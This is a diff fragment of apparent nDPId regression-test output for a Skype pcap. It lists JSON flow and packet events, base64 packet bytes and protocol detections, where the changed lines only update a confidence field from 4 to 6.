-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1431970679995,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970679995,"pkt":"0NQSxnP1PBXCt3IOCABFAAA12TQAAEARDmTAqAEinTg0HTLdnEoAIVxje7ECiU\/XVCamnPFSSydeUAuZRUP3ucHK0w=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1187,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1431970680899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970680899,"pkt":"0NQSxnP1PBXCt3IOCABFAABKn9sAAEARV1TAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1188,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1431970680899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970680899,"pkt":"0NQSxnP1PBXCt3IOCABFAABKCR0AAEAR7hLAqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2XQAAEARDgvAqAEinTg0KzLdnEYALMh9e7MC2jL0tZM0Yzvr0KHAzi3oveeicB3qmta1c4OVExZFkpM\/"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1sl0AAEARTKHAqAEib91KEjLdgQkAIR6we7UCnzLS60tunXakNuMsocCUgSoxAT5iGw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/HVAAAEARe03AqAEiQTffDzLdnF4AK6Bke7cC41QXoMCqTrFc3jjyFt76m6sxlqO9wK+EPcEKNtA\/tkI="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1431970681909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970681909,"pkt":"0NQSxnP1PBXCt3IOCABFAABKnmgAAEARWMfAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1431970681909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970681909,"pkt":"0NQSxnP1PBXCt3IOCABFAABKbIIAAEARiq3AqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1431970681960,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970681960,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3frUAAEARsN7AqAEi1cezkDLdnEkAIwRMe7kCZypNkc74yL7GF7GC5QinylqI\/WPnVsk+"} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431970681960,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970681960,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaTkAAEARlaPAqAEib91KKDLdnFkALS1Je7sCEGG8jv3asKVduW1KlINShpl5CYZ6daDh4AHUflFCiwcMag=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7SRAAEAGAv\/AqAEinTfrkshMnFVVB2sVAAAAALAC\/\/9GzAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -728,10 +728,10 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABARUhAAEAGeZjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8xegAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ToQAAEARSoLAqAEinTeCrzLdnEYAIsBye70C0WV2Jw2JJv9T381tb7aFs7ugTny6Jk4="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmw8AAEARYEjAqAEib91NrTLdnEwALft7e78CS2barOC4bSdle3ySCU4isieKFyYrhir3D1S\/zus1mmpuRQ=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1431970683043,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683043,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIpxVyEzh8Ob8VQdrFqASOJAqmgAAAgQFrAQCCApMYN9LPjJCqwEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1431970683044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JNdAAEAGy1jAqAEinTfrkshMnFVVB2sW4fDm\/YAQECyBfAAAAQEICj4yQvNMYN9L"} 